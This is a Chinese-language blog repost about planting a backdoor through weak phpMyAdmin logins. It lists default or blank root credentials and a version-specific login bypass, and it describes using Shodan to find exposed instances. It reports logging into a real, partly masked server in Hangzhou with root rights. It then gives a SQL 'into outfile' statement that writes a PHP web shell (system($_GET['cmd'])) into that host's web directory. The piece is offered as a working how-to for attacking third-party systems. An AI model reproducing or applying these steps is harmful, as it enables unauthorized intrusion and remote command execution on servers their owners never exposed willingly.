当前位置: 首页 > 新闻动态 > 软件编程

phpMyAdmin通过密码漏洞留后门文件

作者:用户投稿 浏览: 发布日期:2026-01-11
[导读]:今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

地址已手动打码。

http://121.***.*.219:80/

登陆成功(root 权限)。

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对的支持。如果你想了解更多相关内容请查看下面相关链接

免责声明:转载请注明出处:http://sczxchw.cn/news/401955.html

扫一扫高效沟通

多一份参考总有益处

免费领取网站策划SEO优化策划方案

请填写下方表单,我们会尽快与您联系
感谢您的咨询,我们会尽快给您回复!